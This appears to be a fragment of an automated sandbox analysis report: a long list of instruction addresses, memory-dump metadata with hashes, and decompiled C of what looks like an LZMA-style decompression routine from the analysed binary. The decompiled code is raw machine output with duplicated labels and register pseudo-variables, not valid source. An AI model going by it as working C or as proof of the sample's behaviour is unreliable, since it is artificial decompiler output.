                                                            0x00406178
                                                            0x0040617a
                                                            0x0040617b
                                                            0x0040617d
                                                            0x00406180
                                                            0x00406185
                                                            0x0040618a
                                                            0x00406193
                                                            0x004061a6
                                                            0x004061a9
                                                            0x004061b5
                                                            0x004061dd
                                                            0x004061df
                                                            0x004061ed
                                                            0x004061ed
                                                            0x004061f1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061e1
                                                            0x004061e4
                                                            0x004061e5
                                                            0x004061e5
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061bb
                                                            0x004061c0
                                                            0x004061c0
                                                            0x004061c9
                                                            0x004061d1
                                                            0x004061d4
                                                            0x00000000
                                                            0x004061da
                                                            0x004061da
                                                            0x00000000
                                                            0x004061da
                                                            0x00000000
                                                            0x004061f7
                                                            0x004061f7
                                                            0x004061fb
                                                            0x00406aa7
                                                            0x00000000
                                                            0x00406aa7
                                                            0x00406204
                                                            0x00406214
                                                            0x00406217
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621d
                                                            0x00406221
                                                            0x00000000
                                                            0x00000000
                                                            0x00406223
                                                            0x00406229
                                                            0x00406253
                                                            0x00406259
                                                            0x00406260
                                                            0x00000000
                                                            0x00406260
                                                            0x0040622f
                                                            0x00406232
                                                            0x00406237
                                                            0x00406237
                                                            0x00406242
                                                            0x0040624a
                                                            0x0040624d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406292
                                                            0x00406298
                                                            0x0040629b
                                                            0x004062a8
                                                            0x004062b0
                                                            0x00000000
                                                            0x00000000
                                                            0x00406267
                                                            0x00406267
                                                            0x0040626b
                                                            0x00406ab6
                                                            0x00000000
                                                            0x00406ab6
                                                            0x00406277
                                                            0x00406282
                                                            0x00406282
                                                            0x00406282
                                                            0x00406285
                                                            0x00406288
                                                            0x0040628b
                                                            0x00406290
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406927
                                                            0x00406927
                                                            0x0040692d
                                                            0x00406933
                                                            0x00406939
                                                            0x00406953
                                                            0x00406956
                                                            0x0040695c
                                                            0x00406967
                                                            0x00406969
                                                            0x0040693b
                                                            0x0040693b
                                                            0x0040694a
                                                            0x0040694e
                                                            0x0040694e
                                                            0x00406973
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004062b8
                                                            0x004062ba
                                                            0x004062bd
                                                            0x0040632e
                                                            0x00406331
                                                            0x00406334
                                                            0x0040633b
                                                            0x00406345
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x004062bf
                                                            0x004062c3
                                                            0x004062c6
                                                            0x004062c8
                                                            0x004062cb
                                                            0x004062ce
                                                            0x004062d0
                                                            0x004062d3
                                                            0x004062d5
                                                            0x004062da
                                                            0x004062dd
                                                            0x004062e0
                                                            0x004062e4
                                                            0x004062eb
                                                            0x004062ee
                                                            0x004062f5
                                                            0x004062f9
                                                            0x00406301
                                                            0x00406301
                                                            0x00406301
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062f0
                                                            0x004062f0
                                                            0x004062f0
                                                            0x00406305
                                                            0x00406308
                                                            0x00406326
                                                            0x00406328
                                                            0x00000000
                                                            0x0040630a
                                                            0x0040630a
                                                            0x0040630d
                                                            0x00406310
                                                            0x00406313
                                                            0x00406315
                                                            0x00406315
                                                            0x00406315
                                                            0x00406318
                                                            0x0040631b
                                                            0x0040631d
                                                            0x0040631e
                                                            0x00406321
                                                            0x00000000
                                                            0x00406321
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004065c1
                                                            0x004065c5
                                                            0x004065e8
                                                            0x004065eb
                                                            0x004065ee
                                                            0x004065f8
                                                            0x004065c7
                                                            0x004065c7
                                                            0x004065ca
                                                            0x004065cd
                                                            0x004065d0
                                                            0x004065dd
                                                            0x004065e0
                                                            0x004065e0
                                                            0x00406924
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x00000000
                                                            0x00406604
                                                            0x00406608
                                                            0x00000000
                                                            0x00000000
                                                            0x0040660e
                                                            0x00406612
                                                            0x00000000
                                                            0x00000000
                                                            0x00406618
                                                            0x0040661a
                                                            0x0040661e
                                                            0x0040661e
                                                            0x00406621
                                                            0x00406625
                                                            0x00000000
                                                            0x00000000
                                                            0x00406675
                                                            0x00406679
                                                            0x00406680
                                                            0x00406683
                                                            0x00406686
                                                            0x00406690
                                                            0x00406924
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x00406924
                                                            0x0040667b
                                                            0x00000000
                                                            0x00000000
                                                            0x0040669c
                                                            0x004066a0
                                                            0x004066a7
                                                            0x004066aa
                                                            0x004066ad
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066b0
                                                            0x004066b3
                                                            0x004066b6
                                                            0x004066b6
                                                            0x004066b9
                                                            0x004066bc
                                                            0x004066bf
                                                            0x004066bf
                                                            0x004066c2
                                                            0x004066c9
                                                            0x004066ce
                                                            0x00000000
                                                            0x00000000
                                                            0x0040675c
                                                            0x0040675c
                                                            0x00406760
                                                            0x00406afe
                                                            0x00000000
                                                            0x00406afe
                                                            0x00406766
                                                            0x00406769
                                                            0x0040676c
                                                            0x00406770
                                                            0x00406773
                                                            0x00406779
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677e
                                                            0x00406781
                                                            0x00000000
                                                            0x00000000
                                                            0x00406351
                                                            0x00406351
                                                            0x00406355
                                                            0x00406ac2
                                                            0x00000000
                                                            0x00406ac2
                                                            0x0040635b
                                                            0x0040635e
                                                            0x00406361
                                                            0x00406365
                                                            0x00406368
                                                            0x0040636e
                                                            0x00406370
                                                            0x00406370
                                                            0x00406370
                                                            0x00406373
                                                            0x00406376
                                                            0x00406376
                                                            0x00406379
                                                            0x0040637c
                                                            0x00000000
                                                            0x00000000
                                                            0x00406382
                                                            0x00406388
                                                            0x00000000
                                                            0x00000000
                                                            0x0040638e
                                                            0x0040638e
                                                            0x00406392
                                                            0x00406395
                                                            0x00406398
                                                            0x0040639b
                                                            0x0040639e
                                                            0x0040639f
                                                            0x004063a2
                                                            0x004063a4
                                                            0x004063aa
                                                            0x004063ad
                                                            0x004063b0
                                                            0x004063b3
                                                            0x004063b6
                                                            0x004063b9
                                                            0x004063bc
                                                            0x004063d8
                                                            0x004063db
                                                            0x004063de
                                                            0x004063e1
                                                            0x004063e8
                                                            0x004063ec
                                                            0x004063ee
                                                            0x004063f2
                                                            0x004063be
                                                            0x004063be
                                                            0x004063c2
                                                            0x004063ca
                                                            0x004063cf
                                                            0x004063d1
                                                            0x004063d3
                                                            0x004063d3
                                                            0x004063f5
                                                            0x004063fc
                                                            0x004063ff
                                                            0x00000000
                                                            0x00406405
                                                            0x00000000
                                                            0x00406405
                                                            0x00000000
                                                            0x0040640a
                                                            0x0040640a
                                                            0x0040640e
                                                            0x00406ace
                                                            0x00000000
                                                            0x00406ace
                                                            0x00406414
                                                            0x00406417
                                                            0x0040641a
                                                            0x0040641e
                                                            0x00406421
                                                            0x00406427
                                                            0x00406429
                                                            0x00406429
                                                            0x00406429
                                                            0x0040642c
                                                            0x0040642f
                                                            0x0040642f
                                                            0x0040642f
                                                            0x00406435
                                                            0x00000000
                                                            0x00000000
                                                            0x00406437
                                                            0x0040643a
                                                            0x0040643d
                                                            0x00406440
                                                            0x00406443
                                                            0x00406446
                                                            0x00406449
                                                            0x0040644c
                                                            0x0040644f
                                                            0x00406452
                                                            0x00406455
                                                            0x0040646d
                                                            0x00406470
                                                            0x00406473
                                                            0x00406476
                                                            0x00406476
                                                            0x00406479
                                                            0x0040647d
                                                            0x0040647f
                                                            0x00406457
                                                            0x00406457
                                                            0x0040645f
                                                            0x00406464
                                                            0x00406466
                                                            0x00406468
                                                            0x00406468
                                                            0x00406482
                                                            0x00406489
                                                            0x0040648c
                                                            0x00000000
                                                            0x0040648e
                                                            0x00000000
                                                            0x0040648e
                                                            0x0040648c
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00000000
                                                            0x00000000
                                                            0x004064ce
                                                            0x004064ce
                                                            0x004064d2
                                                            0x00406ada
                                                            0x00000000
                                                            0x00406ada
                                                            0x004064d8
                                                            0x004064db
                                                            0x004064de
                                                            0x004064e2
                                                            0x004064e5
                                                            0x004064eb
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064ed
                                                            0x004064f0
                                                            0x004064f3
                                                            0x004064f3
                                                            0x004064f9
                                                            0x00406497
                                                            0x00406497
                                                            0x0040649a
                                                            0x00000000
                                                            0x0040649a
                                                            0x004064fb
                                                            0x004064fb
                                                            0x004064fe
                                                            0x00406501
                                                            0x00406504
                                                            0x00406507
                                                            0x0040650a
                                                            0x0040650d
                                                            0x00406510
                                                            0x00406513
                                                            0x00406516
                                                            0x00406519
                                                            0x00406531
                                                            0x00406534
                                                            0x00406537
                                                            0x0040653a
                                                            0x0040653a
                                                            0x0040653d
                                                            0x00406541
                                                            0x00406543
                                                            0x0040651b
                                                            0x0040651b
                                                            0x00406523
                                                            0x00406528
                                                            0x0040652a
                                                            0x0040652c
                                                            0x0040652c
                                                            0x00406546
                                                            0x0040654d
                                                            0x00406550
                                                            0x00000000
                                                            0x00406552
                                                            0x00000000
                                                            0x00406552
                                                            0x00000000
                                                            0x004067df
                                                            0x004067df
                                                            0x004067e3
                                                            0x00406b0a
                                                            0x00000000
                                                            0x00406b0a
                                                            0x004067e9
                                                            0x004067ec
                                                            0x004067ef
                                                            0x004067f3
                                                            0x004067f6
                                                            0x004067fc
                                                            0x004067fe
                                                            0x004067fe
                                                            0x004067fe
                                                            0x00406801
                                                            0x00000000
                                                            0x00000000
                                                            0x004065af
                                                            0x004065af
                                                            0x004065b2
                                                            0x00406924
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x00000000
                                                            0x004068ee
                                                            0x004068f2
                                                            0x00406914
                                                            0x00406917
                                                            0x00406921
                                                            0x00406924
                                                            0x00406924
                                                            0x00406924
                                                            0x00000000
                                                            0x00406924
                                                            0x00406924
                                                            0x004068f4
                                                            0x004068f7
                                                            0x004068fb
                                                            0x004068fe
                                                            0x004068fe
                                                            0x00406901
                                                            0x00000000
                                                            0x00000000
                                                            0x004069ab
                                                            0x004069af
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069cd
                                                            0x004069d4
                                                            0x004069db
                                                            0x004069e2
                                                            0x004069e2
                                                            0x00000000
                                                            0x004069e2
                                                            0x004069b1
                                                            0x004069b4
                                                            0x004069b7
                                                            0x004069ba
                                                            0x004069c1
                                                            0x00406905
                                                            0x00406905
                                                            0x00406908
                                                            0x00000000
                                                            0x00000000
                                                            0x00406a9c
                                                            0x00406a9f
                                                            0x004069a0
                                                            0x00000000
                                                            0x00000000
                                                            0x004066d6
                                                            0x004066d8
                                                            0x004066df
                                                            0x004066e0
                                                            0x004066e2
                                                            0x004066e5
                                                            0x00000000
                                                            0x00000000
                                                            0x004066ed
                                                            0x004066f0
                                                            0x004066f3
                                                            0x004066f5
                                                            0x004066f7
                                                            0x004066f7
                                                            0x004066f8
                                                            0x004066fb
                                                            0x00406702
                                                            0x00406705
                                                            0x00406713
                                                            0x00000000
                                                            0x00000000
                                                            0x004069e9
                                                            0x004069e9
                                                            0x004069ec
                                                            0x004069f3
                                                            0x00000000
                                                            0x00000000
                                                            0x004069f8
                                                            0x004069f8
                                                            0x004069fc
                                                            0x00406b34
                                                            0x00000000
                                                            0x00406b34
                                                            0x00406a02
                                                            0x00406a05
                                                            0x00406a08
                                                            0x00406a0c
                                                            0x00406a0f
                                                            0x00406a15
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a1a
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a20
                                                            0x00406a20
                                                            0x00406a24
                                                            0x00406a84
                                                            0x00406a87
                                                            0x00406a8c
                                                            0x00406a8d
                                                            0x00406a8f
                                                            0x00406a91
                                                            0x00406a94
                                                            0x004069a0
                                                            0x004069a0
                                                            0x00000000
                                                            0x004069a6
                                                            0x004069a0
                                                            0x00406a26
                                                            0x00406a2c
                                                            0x00406a2f
                                                            0x00406a32
                                                            0x00406a35
                                                            0x00406a38
                                                            0x00406a3b
                                                            0x00406a3e
                                                            0x00406a41
                                                            0x00406a44
                                                            0x00406a47
                                                            0x00406a60
                                                            0x00406a63
                                                            0x00406a66
                                                            0x00406a69
                                                            0x00406a6d
                                                            0x00406a6f
                                                            0x00406a6f
                                                            0x00406a70
                                                            0x00406a73
                                                            0x00406a49
                                                            0x00406a49
                                                            0x00406a51
                                                            0x00406a56
                                                            0x00406a58
                                                            0x00406a5b
                                                            0x00406a5b
                                                            0x00406a76
                                                            0x00406a7d
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00000000
                                                            0x0040671b
                                                            0x0040671e
                                                            0x00406754
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406887
                                                            0x00406887
                                                            0x0040688a
                                                            0x0040688c
                                                            0x00406b16
                                                            0x00000000
                                                            0x00406b16
                                                            0x00406892
                                                            0x00406895
                                                            0x00000000
                                                            0x00000000
                                                            0x0040689b
                                                            0x0040689f
                                                            0x004068a2
                                                            0x004068a2
                                                            0x004068a2
                                                            0x00000000
                                                            0x004068a2
                                                            0x00406720
                                                            0x00406722
                                                            0x00406724
                                                            0x00406726
                                                            0x00406729
                                                            0x0040672a
                                                            0x0040672c
                                                            0x0040672e
                                                            0x00406731
                                                            0x00406734
                                                            0x0040674a
                                                            0x0040674f
                                                            0x00406787
                                                            0x00406787
                                                            0x0040678b
                                                            0x004067b7
                                                            0x004067b9
                                                            0x004067c0
                                                            0x004067c3
                                                            0x004067c6
                                                            0x004067c6
                                                            0x004067cb
                                                            0x004067cb
                                                            0x004067cd
                                                            0x004067d0
                                                            0x004067d7
                                                            0x004067da
                                                            0x00406807
                                                            0x00406807
                                                            0x0040680a
                                                            0x0040680d
                                                            0x00406881
                                                            0x00406881
                                                            0x00406881
                                                            0x00000000
                                                            0x00406881
                                                            0x0040680f
                                                            0x00406815
                                                            0x00406818
                                                            0x0040681b
                                                            0x0040681e
                                                            0x00406821
                                                            0x00406824
                                                            0x00406827
                                                            0x0040682a
                                                            0x0040682d
                                                            0x00406830
                                                            0x00406849
                                                            0x0040684b
                                                            0x0040684e
                                                            0x0040684f
                                                            0x00406852
                                                            0x00406854
                                                            0x00406857
                                                            0x00406859
                                                            0x0040685b
                                                            0x0040685e
                                                            0x00406860
                                                            0x00406863
                                                            0x00406867
                                                            0x00406869
                                                            0x00406869
                                                            0x0040686a
                                                            0x0040686d
                                                            0x00406870
                                                            0x00406832
                                                            0x00406832
                                                            0x0040683a
                                                            0x0040683f
                                                            0x00406841
                                                            0x00406844
                                                            0x00406844
                                                            0x00406873
                                                            0x0040687a
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00406804
                                                            0x00000000
                                                            0x0040687c
                                                            0x00000000
                                                            0x0040687c
                                                            0x0040687a
                                                            0x0040678d
                                                            0x00406790
                                                            0x00406792
                                                            0x00406795
                                                            0x00406798
                                                            0x0040679b
                                                            0x0040679d
                                                            0x004067a0
                                                            0x004067a3
                                                            0x004067a3
                                                            0x004067a6
                                                            0x004067a6
                                                            0x004067a9
                                                            0x004067b0
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00406784
                                                            0x00000000
                                                            0x004067b2
                                                            0x00000000
                                                            0x004067b2
                                                            0x004067b0
                                                            0x00406736
                                                            0x00406739
                                                            0x0040673b
                                                            0x0040673e
                                                            0x00000000
                                                            0x00000000
                                                            0x0040649d
                                                            0x0040649d
                                                            0x004064a1
                                                            0x00406ae6
                                                            0x00000000
                                                            0x00406ae6
                                                            0x004064a7
                                                            0x004064aa
                                                            0x004064ad
                                                            0x004064b0
                                                            0x004064b3
                                                            0x004064b6
                                                            0x004064b9
                                                            0x004064bb
                                                            0x004064be
                                                            0x004064c1
                                                            0x004064c4
                                                            0x004064c6
                                                            0x004064c6
                                                            0x004064c6
                                                            0x00000000
                                                            0x00000000
                                                            0x00406628
                                                            0x00406628
                                                            0x0040662c
                                                            0x00406af2
                                                            0x00000000
                                                            0x00406af2
                                                            0x00406632
                                                            0x00406635
                                                            0x00406638
                                                            0x0040663b
                                                            0x0040663d
                                                            0x0040663d
                                                            0x0040663d
                                                            0x00406640
                                                            0x00406643
                                                            0x00406646
                                                            0x00406649
                                                            0x0040664c
                                                            0x0040664f
                                                            0x00406650
                                                            0x00406652
                                                            0x00406652
                                                            0x00406652
                                                            0x00406655
                                                            0x00406658
                                                            0x0040665b
                                                            0x0040665e
                                                            0x0040665e
                                                            0x0040665e
                                                            0x00406661
                                                            0x00406663
                                                            0x00406663
                                                            0x00000000
                                                            0x00000000
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a5
                                                            0x004068a9
                                                            0x00000000
                                                            0x00000000
                                                            0x004068af
                                                            0x004068b2
                                                            0x004068b5
                                                            0x004068b8
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068ba
                                                            0x004068bd
                                                            0x004068c0
                                                            0x004068c3
                                                            0x004068c6
                                                            0x004068c9
                                                            0x004068cc
                                                            0x004068cd
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068cf
                                                            0x004068d2
                                                            0x004068d5
                                                            0x004068d8
                                                            0x004068db
                                                            0x004068de
                                                            0x004068e2
                                                            0x004068e4
                                                            0x004068e7
                                                            0x00000000
                                                            0x004068e9
                                                            0x00406666
                                                            0x00406666
                                                            0x00000000
                                                            0x00406666
                                                            0x004068e7
                                                            0x00406b1c
                                                            0x00000000
                                                            0x00000000
                                                            0x0040614b
                                                            0x00406b53
                                                            0x00406b53
                                                            0x00000000
                                                            0x00406b53
                                                            0x004069a0
                                                            0x00406927
                                                            0x00406924
                                                            0x00000000
                                                            0x0040655b

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52914874a4ae288a0090ad4813887b32842d8fe9a5a82c0860c7b0c89e61596f
                                                            • Instruction ID: 58d989ae5c12bcd237a7596d454377c992e25c5bcc6bbfe45bc07114c875b854
                                                            • Opcode Fuzzy Hash: 52914874a4ae288a0090ad4813887b32842d8fe9a5a82c0860c7b0c89e61596f
                                                            • Instruction Fuzzy Hash: 867113B1E04229CBDF28CF98C844BADBBF1FB44305F15816AD816BB281D7789996DF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 98%
                                                            			E00406675() {
                                                            				unsigned short _t531;
                                                            				signed int _t532;
                                                            				void _t533;
                                                            				signed int _t534;
                                                            				signed int _t535;
                                                            				signed int _t565;
                                                            				signed int _t568;
                                                            				signed int _t589;
                                                            				signed int* _t606;
                                                            				void* _t613;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					if( *(_t613 - 0x40) != 0) {
                                                            						 *(_t613 - 0x84) = 0xb;
                                                            						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                            						goto L132;
                                                            					} else {
                                                            						__eax =  *(__ebp - 0x28);
                                                            						L88:
                                                            						 *(__ebp - 0x2c) = __eax;
                                                            						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            						L89:
                                                            						__eax =  *(__ebp - 4);
                                                            						 *(__ebp - 0x80) = 0x15;
                                                            						__eax =  *(__ebp - 4) + 0xa68;
                                                            						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                            						L69:
                                                            						 *(__ebp - 0x84) = 0x12;
                                                            						while(1) {
                                                            							L132:
                                                            							 *(_t613 - 0x54) = _t606;
                                                            							while(1) {
                                                            								L133:
                                                            								_t531 =  *_t606;
                                                            								_t589 = _t531 & 0x0000ffff;
                                                            								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                            								if( *(_t613 - 0xc) >= _t565) {
                                                            									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                            									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                            									 *(_t613 - 0x40) = 1;
                                                            									_t532 = _t531 - (_t531 >> 5);
                                                            									 *_t606 = _t532;
                                                            								} else {
                                                            									 *(_t613 - 0x10) = _t565;
                                                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                            								}
                                                            								if( *(_t613 - 0x10) >= 0x1000000) {
                                                            									goto L139;
                                                            								}
                                                            								L137:
                                                            								if( *(_t613 - 0x6c) == 0) {
                                                            									 *(_t613 - 0x88) = 5;
                                                            									L170:
                                                            									_t568 = 0x22;
                                                            									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                            									_t535 = 0;
                                                            									L172:
                                                            									return _t535;
                                                            								}
                                                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                            								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                            								L139:
                                                            								_t533 =  *(_t613 - 0x84);
                                                            								while(1) {
                                                            									 *(_t613 - 0x88) = _t533;
                                                            									while(1) {
                                                            										L1:
                                                            										_t534 =  *(_t613 - 0x88);
                                                            										if(_t534 > 0x1c) {
                                                            											break;
                                                            										}
                                                            										switch( *((intOrPtr*)(_t534 * 4 +  &M00406B5B))) {
                                                            											case 0:
                                                            												if( *(_t613 - 0x6c) == 0) {
                                                            													goto L170;
                                                            												}
                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            												_t534 =  *( *(_t613 - 0x70));
                                                            												if(_t534 > 0xe1) {
                                                            													goto L171;
                                                            												}
                                                            												_t538 = _t534 & 0x000000ff;
                                                            												_push(0x2d);
                                                            												asm("cdq");
                                                            												_pop(_t570);
                                                            												_push(9);
                                                            												_pop(_t571);
                                                            												_t609 = _t538 / _t570;
                                                            												_t540 = _t538 % _t570 & 0x000000ff;
                                                            												asm("cdq");
                                                            												_t604 = _t540 % _t571 & 0x000000ff;
                                                            												 *(_t613 - 0x3c) = _t604;
                                                            												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                            												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                            												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                            												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                            													L10:
                                                            													if(_t612 == 0) {
                                                            														L12:
                                                            														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                            														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            														goto L15;
                                                            													} else {
                                                            														goto L11;
                                                            													}
                                                            													do {
                                                            														L11:
                                                            														_t612 = _t612 - 1;
                                                            														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                            													} while (_t612 != 0);
                                                            													goto L12;
                                                            												}
                                                            												if( *(_t613 - 4) != 0) {
                                                            													GlobalFree( *(_t613 - 4));
                                                            												}
                                                            												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                            												 *(_t613 - 4) = _t534;
                                                            												if(_t534 == 0) {
                                                            													goto L171;
                                                            												} else {
                                                            													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                            													goto L10;
                                                            												}
                                                            											case 1:
                                                            												L13:
                                                            												__eflags =  *(_t613 - 0x6c);
                                                            												if( *(_t613 - 0x6c) == 0) {
                                                            													 *(_t613 - 0x88) = 1;
                                                            													goto L170;
                                                            												}
                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            												_t45 = _t613 - 0x48;
                                                            												 *_t45 =  *(_t613 - 0x48) + 1;
                                                            												__eflags =  *_t45;
                                                            												L15:
                                                            												if( *(_t613 - 0x48) < 4) {
                                                            													goto L13;
                                                            												}
                                                            												_t546 =  *(_t613 - 0x40);
                                                            												if(_t546 ==  *(_t613 - 0x74)) {
                                                            													L20:
                                                            													 *(_t613 - 0x48) = 5;
                                                            													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                            													goto L23;
                                                            												}
                                                            												 *(_t613 - 0x74) = _t546;
                                                            												if( *(_t613 - 8) != 0) {
                                                            													GlobalFree( *(_t613 - 8));
                                                            												}
                                                            												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                            												 *(_t613 - 8) = _t534;
                                                            												if(_t534 == 0) {
                                                            													goto L171;
                                                            												} else {
                                                            													goto L20;
                                                            												}
                                                            											case 2:
                                                            												L24:
                                                            												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                            												 *(_t613 - 0x84) = 6;
                                                            												 *(_t613 - 0x4c) = _t553;
                                                            												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                            												L132:
                                                            												 *(_t613 - 0x54) = _t606;
                                                            												goto L133;
                                                            											case 3:
                                                            												L21:
                                                            												__eflags =  *(_t613 - 0x6c);
                                                            												if( *(_t613 - 0x6c) == 0) {
                                                            													 *(_t613 - 0x88) = 3;
                                                            													goto L170;
                                                            												}
                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            												_t67 = _t613 - 0x70;
                                                            												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                            												__eflags =  *_t67;
                                                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                            												L23:
                                                            												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                            												if( *(_t613 - 0x48) != 0) {
                                                            													goto L21;
                                                            												}
                                                            												goto L24;
                                                            											case 4:
                                                            												L133:
                                                            												_t531 =  *_t606;
                                                            												_t589 = _t531 & 0x0000ffff;
                                                            												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                            												if( *(_t613 - 0xc) >= _t565) {
                                                            													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                            													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                            													 *(_t613 - 0x40) = 1;
                                                            													_t532 = _t531 - (_t531 >> 5);
                                                            													 *_t606 = _t532;
                                                            												} else {
                                                            													 *(_t613 - 0x10) = _t565;
                                                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                            												}
                                                            												if( *(_t613 - 0x10) >= 0x1000000) {
                                                            													goto L139;
                                                            												}
                                                            											case 5:
                                                            												goto L137;
                                                            											case 6:
                                                            												__edx = 0;
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__eax =  *(__ebp - 4);
                                                            													__ecx =  *(__ebp - 0x38);
                                                            													 *(__ebp - 0x34) = 1;
                                                            													 *(__ebp - 0x84) = 7;
                                                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                            													while(1) {
                                                            														L132:
                                                            														 *(_t613 - 0x54) = _t606;
                                                            														goto L133;
                                                            													}
                                                            												}
                                                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                            												__esi =  *(__ebp - 0x60);
                                                            												__cl = 8;
                                                            												__cl = 8 -  *(__ebp - 0x3c);
                                                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                            												__ecx =  *(__ebp - 0x3c);
